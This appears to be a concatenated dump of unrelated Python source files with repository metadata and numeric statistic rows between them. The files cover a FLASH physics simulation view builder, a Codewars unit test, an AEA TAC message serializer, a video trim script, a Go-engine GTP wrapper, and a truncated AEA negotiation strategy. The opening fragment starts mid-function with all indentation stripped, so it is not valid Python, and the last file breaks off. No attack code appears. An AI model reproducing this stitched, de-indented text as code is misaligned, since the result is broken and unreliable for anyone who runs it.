v.basic.append('physics_materialProperties_MagneticResistivity_MagneticResistivityMain.useMagneticResistivity')
v.basic.append([])
for s in self._get_species_list(schema):
v.basic[-1].append(
[s.title(), [
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Absorb',
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Emiss',
f'physics_materialProperties_Opacity_OpacityMain_Multispecies.op_{s}Trans',
]],
)
return v
def _view_Multispecies_MultispeciesMain(self, schema):
v = PKDict(
title='Multispecies',
basic=[
[],
],
)
for s in self._get_species_list(schema):
v.basic[-1].append(
[s.title(), [
f'ms_{s}A',
f'ms_{s}Z',
f'ms_{s}ZMin',
f'eos_{s}EosType',
f'eos_{s}SubType',
f'eos_{s}TableFile',
]],
)
return v
def _view_physics_RadTrans_RadTransMain_MGD(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4.py?submit=rp_RadTrans.txt
v = PKDict(
title='Radiative Transfer',
basic=[
['Main', [
'rt_useMGD',
'rt_mgdFlMode',
'rt_mgdFlCoef',
[
['X', [
'rt_mgdXlBoundaryType',
'rt_mgdXrBoundaryType',
]],
['Y', [
'rt_mgdYlBoundaryType',
'rt_mgdYrBoundaryType',
]],
['Z', [
'rt_mgdZlBoundaryType',
'rt_mgdZrBoundaryType',
]],
],
]],
['MGD Groups', [
'rt_mgdNumGroups',
'rt_mgdBounds_1',
'rt_mgdBounds_2',
'rt_mgdBounds_3',
'rt_mgdBounds_4',
'rt_mgdBounds_5',
'rt_mgdBounds_6',
'rt_mgdBounds_7',
]],
],
)
if 'physics_RadTrans_RadTransMain' in schema.model:
v.basic[0][1].insert(0, 'physics_RadTrans_RadTransMain.rt_dtFactor')
v.basic[0][1].insert(0, 'physics_RadTrans_RadTransMain.useRadTrans')
return v
def _view_physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p22.py?submit=rp_EnergyDeposition.txt
v = PKDict(
title='Energy Deposition - Laser',
basic=[
['Bulk', [
'useEnergyDeposition',
'ed_maxRayCount',
'ed_gradOrder',
'ed_laser3Din2D',
'ed_laser3Din2DwedgeAngle',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_useLaserIO',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_laserIOMaxNumberOfPositions',
'physics_sourceTerms_EnergyDeposition_EnergyDepositionMain_Laser_LaserIO.ed_laserIOMaxNumberOfRays',
]],
['Pulse 1', [
'ed_numberOfPulses',
'ed_numberOfSections_1',
[
['Time', [
'ed_time_1_1',
'ed_time_1_2',
'ed_time_1_3',
'ed_time_1_4',
]],
['Power', [
'ed_power_1_1',
'ed_power_1_2',
'ed_power_1_3',
'ed_power_1_4',
]]
]
]],
['Beam 1', [
[
['X', [
'ed_lensX_1',
'ed_targetX_1',
]],
['Y', [
'ed_lensY_1',
'ed_targetY_1',
]],
['Z', [
'ed_lensZ_1',
'ed_targetZ_1',
]]
],
'ed_numberOfBeams',
'ed_lensSemiAxisMajor_1',
'ed_crossSectionFunctionType_1',
'ed_numberOfRays_1',
'ed_pulseNumber_1',
'ed_wavelength_1',
'ed_gridType_1',
'ed_gridnRadialTics_1',
'ed_gaussianExponent_1',
[
['Major', [
'ed_gaussianRadiusMajor_1',
'ed_gaussianCenterMajor_1',
'ed_targetSemiAxisMajor_1',
'ed_semiAxisMajorTorsionAngle_1',
'ed_semiAxisMajorTorsionAxis_1',
]],
['Minor', [
'ed_gaussianRadiusMinor_1',
'ed_gaussianCenterMinor_1',
'ed_targetSemiAxisMinor_1',
]],
],
]],
],
)
return v
def _view_physics_sourceTerms_Flame_FlameMain(self, schema):
# TODO(e-carlin): add _LABELS for things
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Flame.txt
v = PKDict(
basic=[
'useFlame',
'fl_epsilon_0',
'fl_epsilon_1',
'fl_kpp_fact',
'fl_b',
],
)
if 'physics_sourceTerms_Flame_FlameEffects_EIP' in schema.model:
v.basic.extend([
[
['Unburned', [
'physics_sourceTerms_Flame_FlameEffects_EIP.ye_unburned',
'physics_sourceTerms_Flame_FlameEffects_EIP.sumyi_unburned',
]],
['Burned', [
'physics_sourceTerms_Flame_FlameEffects_EIP.ye_burned',
'physics_sourceTerms_Flame_FlameEffects_EIP.sumyi_burned',
]],
],
'physics_sourceTerms_Flame_FlameEffects_EIP.flame_deltae',
])
if 'physics_sourceTerms_Flame_FlameSpeed_Constant' in schema.model:
v.basic.append('physics_sourceTerms_Flame_FlameSpeed_Constant.fl_fsConstFlameSpeed')
return v
def _view_Simulation_SimulationMain_flashApp(self, schema):
if 'sim_condWall' in schema.model.Simulation_SimulationMain_flashApp:
#TODO(pjm): special views for cap laser, instead look for common species fields
return PKDict(
title='FLASH Simulation',
basic=[
'sim_condWall',
'sim_peakField',
'sim_period',
'sim_zminWall',
[
['Fill', [
'sim_eosFill',
'sim_rhoFill',
'sim_teleFill',
'sim_tionFill',
'sim_tradFill',
]],
['Wall', [
'sim_eosWall',
'sim_rhoWall',
'sim_teleWall',
'sim_tionWall',
'sim_tradWall',
]],
],
],
)
return PKDict(
title='FLASH Simulation',
basic=schema.view.Simulation_SimulationMain_flashApp.advanced,
advanced=[]
)
| 39.884164 | 125 | 0.500607 | 2,375 | 27,201 | 5.433684 | 0.221895 | 0.005114 | 0.020147 | 0.013018 | 0.256102 | 0.180473 | 0.126463 | 0.083688 | 0.056102 | 0.049593 | 0 | 0.012176 | 0.405206 | 27,201 | 681 | 126 | 39.942731 | 0.785463 | 0.052351 | 0 | 0.212361 | 0 | 0.001585 | 0.314083 | 0.137603 | 0 | 0 | 0 | 0.001468 | 0.007924 | 1 | 0.034865 | false | 0 | 0.007924 | 0.001585 | 0.077655 | 0.001585 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f235270cb6f9f5b537966a86b660e1348d1bfa | 3,484 | py | Python | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 1 | 2022-02-12T05:56:04.000Z | 2022-02-12T05:56:04.000Z | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 182 | 2020-04-30T00:51:36.000Z | 2021-09-07T04:15:05.000Z | kyu_6/color_choice/test_checkchoose.py | pedrocodacyorg2/codewars | ba3ea81125b6082d867f0ae34c6c9be15e153966 | [
"Unlicense"
] | 4 | 2020-04-29T22:04:20.000Z | 2021-07-13T20:04:14.000Z | # Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
# FUNDAMENTALS
import allure
import unittest
from utils.log_func import print_log
from kyu_6.color_choice.checkchoose import checkchoose
@allure.epic('6 kyu')
@allure.parent_suite('Novice')
@allure.suite("Fundamentals")
@allure.sub_suite("Unit Tests")
@allure.feature("Factorial")
@allure.story('Color Choice')
@allure.tag('FUNDAMENTALS')
@allure.link(url='https://www.codewars.com/kata/55be10de92aad5ef28000023/train/python',
name='Source/Kata')
class CheckchooseTestCase(unittest.TestCase):
"""
Testing checkchoose function
"""
def test_checkchoose(self):
"""
In mathematics the number of x combinations you can take from a
set of n elements is called the binomial coefficient of n and x,
or more often n choose x. The formula to compute m = n choose x is:
m = n! / (x! * (n - x)!) where ! is the factorial operator.
You are a renowned poster designer and painter. You are asked to
provide 6 posters all having the same design each in 2 colors.
Posters must all have a different color combination and you have
the choice of 4 colors: red, blue, yellow, green. How many colors
can you choose for each poster?
"""
allure.dynamic.title("Testing checkchoose function")
allure.dynamic.severity(allure.severity_level.NORMAL)
allure.dynamic.description_html('<h3>Codewars badge:</h3>'
'<img src="https://www.codewars.com/users/myFirstCode'
'/badges/large">'
'<h3>Test Description:</h3>'
"<p>Knowing m (number of posters to design), knowing n "
"(total number of available colors), let us search x "
"(number of colors for each poster so that each poster "
"has a unique combination of colors and the number of "
"combinations is exactly the same as the number of posters). "
"In other words we must find x such as n choose x = m (1) "
"for a given m and a given n; m >= 0 and n > 0. If many x "
"are solutions give as result the smallest x. It can happen "
"that when m is given at random there are no x satisfying "
"equation (1) then return -1.</p>")
test_data = (
(6, 4, 2),
(4, 4, 1),
(4, 2, -1),
(35, 7, 3),
(36, 7, -1),
(1, 6, 0),
(1, 15, 0),
(2, 12, -1),
(75788358475481302186, 87, -1),
)
for d in test_data:
m = d[0]
n = d[1]
expected = d[2]
result = checkchoose(m, n)
with allure.step("Pass m: {}, "
"n: {} and assert the "
"result: {} vs "
"expected: {}".format(m, n, result, expected)):
print_log(m=m, n=n, result=result, expected=expected)
self.assertEqual(expected, result)
| 41.975904 | 102 | 0.516648 | 412 | 3,484 | 4.339806 | 0.432039 | 0.026846 | 0.018456 | 0.021253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038821 | 0.386338 | 3,484 | 82 | 103 | 42.487805 | 0.797474 | 0.202067 | 0 | 0 | 0 | 0 | 0.330217 | 0 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.018868 | false | 0.018868 | 0.075472 | 0 | 0.113208 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f3a271aa7f1a6b6b2929add330dd33a42c44e8 | 13,442 | py | Python | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | 1 | 2021-07-25T18:50:18.000Z | 2021-07-25T18:50:18.000Z | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | null | null | null | packages/protocols/tac/serialization.py | 8ball030/agents-aea | fcf470e3daa9bd8e272ca66542c6003feb0fd7a8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Serialization for the TAC protocol."""
import sys
from typing import Any, Dict, TYPE_CHECKING
from aea.protocols.base import Message
from aea.protocols.base import Serializer
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.protocols.tac import tac_pb2
from packages.protocols.tac.message import TACMessage
else:
import tac_protocol.tac_pb2 as tac_pb2 # pragma: no cover
from tac_protocol.message import TACMessage # pragma: no cover
def _from_dict_to_pairs(d):
"""Convert a flat dictionary into a list of StrStrPair or StrIntPair."""
result = []
items = sorted(d.items(), key=lambda pair: pair[0])
for key, value in items:
if type(value) == int:
pair = tac_pb2.StrIntPair()
elif type(value) == str:
pair = tac_pb2.StrStrPair()
elif type(value) == float:
pair = tac_pb2.StrFloatPair()
else:
raise ValueError("Either 'int' or 'str' or 'float', not {}".format(type(value)))
pair.first = key
pair.second = value
result.append(pair)
return result
def _from_pairs_to_dict(pairs):
"""Convert a list of StrStrPair or StrIntPair or StrFloatPair into a flat dictionary."""
result = {}
for pair in pairs:
key = pair.first
value = pair.second
result[key] = value
return result
class TACSerializer(Serializer):
"""Serialization for the TAC protocol."""
def encode(self, msg: Message) -> bytes:
"""
Decode the message.
:param msg: the message object
:return: the bytes
"""
tac_type = TACMessage.Type(msg.get("type"))
tac_container = tac_pb2.TACMessage()
if tac_type == TACMessage.Type.REGISTER:
agent_name = msg.get("agent_name")
tac_msg = tac_pb2.TACAgent.Register() # type: ignore
tac_msg.agent_name = agent_name
tac_container.register.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.UNREGISTER:
tac_msg = tac_pb2.TACAgent.Unregister() # type: ignore
tac_container.unregister.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION:
tac_msg = tac_pb2.TACAgent.Transaction() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.counterparty = msg.get("counterparty")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.sender_tx_fee = msg.get("sender_tx_fee")
tac_msg.counterparty_tx_fee = msg.get("counterparty_tx_fee")
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GET_STATE_UPDATE:
tac_msg = tac_pb2.TACAgent.GetStateUpdate() # type: ignore
tac_container.get_state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.CANCELLED:
tac_msg = tac_pb2.TACController.Cancelled() # type: ignore
tac_container.cancelled.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GAME_DATA:
tac_msg = tac_pb2.TACController.GameData() # type: ignore
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.exchange_params_by_currency.extend(_from_dict_to_pairs(msg.get("exchange_params_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_msg.utility_params_by_good_pbk.extend(_from_dict_to_pairs(msg.get("utility_params_by_good_pbk")))
tac_msg.tx_fee = msg.get("tx_fee")
tac_msg.agent_pbk_to_name.extend(_from_dict_to_pairs(msg.get("agent_pbk_to_name")))
tac_msg.good_pbk_to_name.extend(_from_dict_to_pairs(msg.get("good_pbk_to_name")))
tac_msg.version_id = msg.get("version_id")
tac_container.game_data.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION_CONFIRMATION:
tac_msg = tac_pb2.TACController.TransactionConfirmation() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction_confirmation.CopyFrom(tac_msg)
# elif tac_type == TACMessage.Type.STATE_UPDATE:
# tac_msg = tac_pb2.TACController.StateUpdate() # type: ignore
# game_data_json = msg.get("game_data")
# game_data = tac_pb2.TACController.GameData() # type: ignore
# game_data.amount_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["amount_by_currency"]))) # type: ignore
# game_data.exchange_params_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["exchange_params_by_currency"]))) # type: ignore
# game_data.quantities_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["quantities_by_good_pbk"]))) # type: ignore
# game_data.utility_params_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["utility_params_by_good_pbk"]))) # type: ignore
# game_data.tx_fee = game_data_json["tx_fee"] # type: ignore
# game_data.agent_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["agent_pbk_to_name"]))) # type: ignore
# game_data.good_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["good_pbk_to_name"]))) # type: ignore
# tac_msg.initial_state.CopyFrom(game_data)
# transactions = []
# msg_transactions = cast(List[Any], msg.get("transactions"))
# for t in msg_transactions:
# tx = tac_pb2.TACAgent.Transaction() # type: ignore
# tx.transaction_id = t.get("transaction_id")
# tx.counterparty = t.get("counterparty")
# tx.amount_by_currency.extend(_from_dict_to_pairs(t.get("amount_by_currency")))
# tx.sender_tx_fee = t.get("sender_tx_fee")
# tx.counterparty_tx_fee = t.get("counterparty_tx_fee")
# tx.quantities_by_good_pbk.extend(_from_dict_to_pairs(t.get("quantities_by_good_pbk")))
# transactions.append(tx)
# tac_msg.txs.extend(transactions)
# tac_container.state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TAC_ERROR:
tac_msg = tac_pb2.TACController.Error() # type: ignore
tac_msg.error_code = TACMessage.ErrorCode(msg.get("error_code")).value
if msg.is_set("error_msg"):
tac_msg.error_msg = msg.get("error_msg")
if msg.is_set("details"):
tac_msg.details.update(msg.get("details"))
tac_container.error.CopyFrom(tac_msg)
else:
raise ValueError("Type not recognized: {}.".format(tac_type))
tac_message_bytes = tac_container.SerializeToString()
return tac_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
tac_container = tac_pb2.TACMessage()
tac_container.ParseFromString(obj)
new_body = {} # type: Dict[str, Any]
tac_type = tac_container.WhichOneof("content")
if tac_type == "register":
new_body["type"] = TACMessage.Type.REGISTER
new_body["agent_name"] = tac_container.register.agent_name
elif tac_type == "unregister":
new_body["type"] = TACMessage.Type.UNREGISTER
elif tac_type == "transaction":
new_body["type"] = TACMessage.Type.TRANSACTION
new_body["transaction_id"] = tac_container.transaction.transaction_id
new_body["counterparty"] = tac_container.transaction.counterparty
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction.amount_by_currency)
new_body["sender_tx_fee"] = tac_container.transaction.sender_tx_fee
new_body["counterparty_tx_fee"] = tac_container.transaction.counterparty_tx_fee
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction.quantities_by_good_pbk)
elif tac_type == "get_state_update":
new_body["type"] = TACMessage.Type.GET_STATE_UPDATE
elif tac_type == "cancelled":
new_body["type"] = TACMessage.Type.CANCELLED
elif tac_type == "game_data":
new_body["type"] = TACMessage.Type.GAME_DATA
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.game_data.amount_by_currency)
new_body["exchange_params_by_currency"] = _from_pairs_to_dict(tac_container.game_data.exchange_params_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.quantities_by_good_pbk)
new_body["utility_params_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.utility_params_by_good_pbk)
new_body["tx_fee"] = tac_container.game_data.tx_fee
new_body["agent_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.agent_pbk_to_name)
new_body["good_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.good_pbk_to_name)
new_body["version_id"] = tac_container.game_data.version_id
elif tac_type == "transaction_confirmation":
new_body["type"] = TACMessage.Type.TRANSACTION_CONFIRMATION
new_body["transaction_id"] = tac_container.transaction_confirmation.transaction_id
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction_confirmation.amount_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction_confirmation.quantities_by_good_pbk)
# elif tac_type == "state_update":
# new_body["type"] = TACMessage.Type.STATE_UPDATE
# game_data = dict(
# amount_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.amount_by_currency),
# exchange_params_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.exchange_params_by_currency),
# quantities_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.quantities_by_good_pbk),
# utility_params_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.utility_params_by_good_pbk),
# tx_fee=tac_container.state_update.game_data.tx_fee,
# agent_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.agent_pbk_to_name),
# good_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.good_pbk_to_name),
# version_id=tac_container.state_update.game_data.version_id
# )
# new_body["game_data"] = game_data
# transactions = []
# for transaction in tac_container.state_update.transactions:
# tx_json = dict(
# transaction_id=transaction.transaction_id,
# counterparty=transaction.counterparty,
# amount_by_currency=_from_pairs_to_dict(transaction.amount_by_currency),
# sender_tx_fee=transaction.sender_tx_fee,
# counterparty_tx_fee=transaction.counterparty_tx_fee,
# quantities_by_good_pbk=_from_pairs_to_dict(transaction.quantities_by_good_pbk),
# )
# transactions.append(tx_json)
# new_body["transactions"] = transactions
elif tac_type == "error":
new_body["type"] = TACMessage.Type.TAC_ERROR
new_body["error_code"] = TACMessage.ErrorCode(tac_container.error.error_code)
if tac_container.error.error_msg:
new_body["error_msg"] = tac_container.error.error_msg
if tac_container.error.details:
new_body["details"] = dict(tac_container.error.details)
else:
raise ValueError("Type not recognized.")
tac_type = TACMessage.Type(new_body["type"])
new_body["type"] = tac_type
tac_message = TACMessage(tac_type=tac_type, body=new_body)
return tac_message
| 54.865306 | 164 | 0.669618 | 1,728 | 13,442 | 4.80787 | 0.10706 | 0.066442 | 0.030332 | 0.045739 | 0.569572 | 0.455344 | 0.36856 | 0.316442 | 0.285508 | 0.25674 | 0 | 0.003156 | 0.222214 | 13,442 | 244 | 165 | 55.090164 | 0.791487 | 0.349204 | 0 | 0.115108 | 0 | 0 | 0.106179 | 0.030604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028777 | false | 0 | 0.057554 | 0 | 0.122302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f681aa0c27c6fee045207209eb0d085f1d4754 | 266 | py | Python | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | 57 | 2019-01-31T17:32:46.000Z | 2022-03-23T05:46:51.000Z | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | null | null | null | Miscellaneous groups/[sakuraba]/Completed/ac_PromareBD_01_B.py | tuilakhanh/Encoding-Projects | 8b254913457cb28e7d0890ad6b974d0d8f0cbecc | [
"MIT"
] | 12 | 2019-04-30T06:16:13.000Z | 2022-03-14T16:15:07.000Z | #!/usr/bin/env python3
import acsuite as acs
import lvsfunc as lvf
ac = acs.AC()
path = r'G:/src/PROMARE/BDMV/STREAM/00000-02.mkv'
src = lvf.src(path)
if __name__ == "__main__":
ac.eztrim(src, [(600, -24)], path[:-4]+"_Track03.wav", "PromareBD_01_B_cut.wav")
| 22.166667 | 84 | 0.672932 | 46 | 266 | 3.630435 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077922 | 0.131579 | 266 | 11 | 85 | 24.181818 | 0.645022 | 0.078947 | 0 | 0 | 0 | 0 | 0.331967 | 0.25 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f73da5f0b431ca3202f939fe112d9c748dfe83 | 3,570 | py | Python | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 65 | 2017-10-30T15:55:07.000Z | 2021-11-11T14:03:01.000Z | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 16 | 2017-11-03T02:05:16.000Z | 2019-12-17T08:14:53.000Z | gtp.py | daoqiclub/alphagozero | 211b84b5437bd58e426f49058c8897fef354ba18 | [
"MIT"
] | 22 | 2017-11-03T02:03:46.000Z | 2022-02-20T13:33:32.000Z | #!/usr/bin/env python
import sys
from conf import conf
from play import game_init
from engine import ModelEngine, COLOR_TO_PLAYER
from model import load_best_model
import string
import os
from __init__ import __version__
SIZE = conf['SIZE']
class Engine(object):
def __init__(self, model, logfile):
self.board, self.player = game_init()
self.start_engine(model)
self.logfile = logfile
def start_engine(self, model):
self.engine = ModelEngine(model, conf['MCTS_SIMULATIONS'], self.board)
def name(self):
return "AlphaGoZero Python - {} - {} simulations".format(self.engine.model.name, conf['MCTS_SIMULATIONS'])
def version(self):
return __version__
def protocol_version(self):
return "2"
def list_commands(self):
return ""
def boardsize(self, size):
size = int(size)
if size != SIZE:
raise Exception("The board size in configuration is {0}x{0} but GTP asked to play {1}x{1}".format(SIZE, size))
return ""
def komi(self, komi):
# Don't check komi in GTP engine. The algorithm has learned with a specific
# komi that we don't have any way to influence after learning.
return ""
def parse_move(self, move):
if move.lower() == 'pass':
x, y = 0, SIZE
return x, y
else:
letter = move[0]
number = move[1:]
x = string.ascii_uppercase.index(letter)
if x >= 9:
x -= 1 # I is a skipped letter
y = int(number) - 1
x, y = x, SIZE - y - 1
return x, y
def print_move(self, x, y):
x, y = x, SIZE - y - 1
if x >= 8:
x += 1 # I is a skipped letter
move = string.ascii_uppercase[x] + str(y + 1)
return move
def play(self, color, move):
announced_player = COLOR_TO_PLAYER[color]
assert announced_player == self.player
x, y = self.parse_move(move)
self.board, self.player = self.engine.play(color, x, y)
return ""
def genmove(self, color):
announced_player = COLOR_TO_PLAYER[color]
assert announced_player == self.player
x, y, policy_target, value, self.board, self.player, policy = self.engine.genmove(color)
self.player = self.board[0, 0, 0, -1] # engine updates self.board already
with open(self.logfile, 'a') as f:
f.write("PLAYER" + str(self.player) + '\n')
move_string = self.print_move(x, y)
result = move_string
return result
def clear_board(self):
self.board, self.player = game_init()
return ""
def parse_command(self, line):
tokens = line.strip().split(" ")
command = tokens[0]
args = tokens[1:]
method = getattr(self, command)
result = method(*args)
if not result.strip():
return "=\n\n"
return "= " + result + "\n\n"
def main():
model = load_best_model()
gtp_log = os.path.join(conf['ROOT_DIR'], conf['LOG_DIR'], conf['GTP_LOGFILE'])
engine = Engine(model, gtp_log)
with open(gtp_log, 'w') as f:
for line in sys.stdin:
f.write("<<<" + line)
result = engine.parse_command(line)
if result.strip():
sys.stdout.write(result)
sys.stdout.flush()
f.write("'''" + str(engine.player) + '\n')
f.write(">>>" + result)
f.flush()
if __name__ == "__main__":
main()
| 29.02439 | 122 | 0.567787 | 468 | 3,570 | 4.192308 | 0.267094 | 0.010194 | 0.026504 | 0.038736 | 0.123344 | 0.123344 | 0.086646 | 0.067278 | 0.067278 | 0.067278 | 0 | 0.00895 | 0.311485 | 3,570 | 122 | 123 | 29.262295 | 0.78926 | 0.065266 | 0 | 0.159574 | 0 | 0.010638 | 0.066066 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0.159574 | false | 0.010638 | 0.085106 | 0.053191 | 0.404255 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f7f1ba54312fe0a72f93cca2bd80b9cecefceb | 8,783 | py | Python | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 3 | 2021-09-03T11:24:46.000Z | 2021-12-01T08:03:42.000Z | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 17 | 2021-09-20T07:39:09.000Z | 2022-03-22T12:00:22.000Z | EoT-Agents-Manifacturing-Marketplace/purchasing_agent_1/skills/fipa_negotiation/strategy.py | boschresearch/open-eot-agents | 234ca54b31db4915df03a16210be4f6cd765e09c | [
"Apache-2.0"
] | 1 | 2022-03-15T12:34:03.000Z | 2022-03-15T12:34:03.000Z | # Copyright (c) 2021 - for information on the respective copyright owner see the NOTICE file and/or the repository https://github.com/boschresearch/open-eot-agents.
#
# SPDX-License-Identifier: Apache-2.0
from typing import Any, Dict, List, Tuple
from aea.common import Address
from aea.exceptions import enforce
from aea.helpers.search.generic import SIMPLE_SERVICE_MODEL
from aea.helpers.search.models import (
Constraint,
ConstraintType,
Description,
Query,
)
from aea.helpers.transaction.base import Terms
from aea.skills.base import Model
from packages.bosch.contracts.service_directory.contract import ServiceDirectory
DEFAULT_IS_LEDGER_TX = True
DEFAULT_CONTRACT_ADDRESS = "0x0"
DEFAULT_DEPLOYER_ADDRESS = "0x0"
DEFAULT_MAX_NEGOTIATIONS = 2
DEFAULT_SEARCH_SERVICE_1 = {"id": "3D_printing_service", "max_tx_fee": 1, "max_unit_price": 10, "min_quantity": 1, "max_quantity": 4,
"search_query": {
"constraint_type": "==",
"search_key": "seller_service",
"search_value": "3D_printing_service",}}
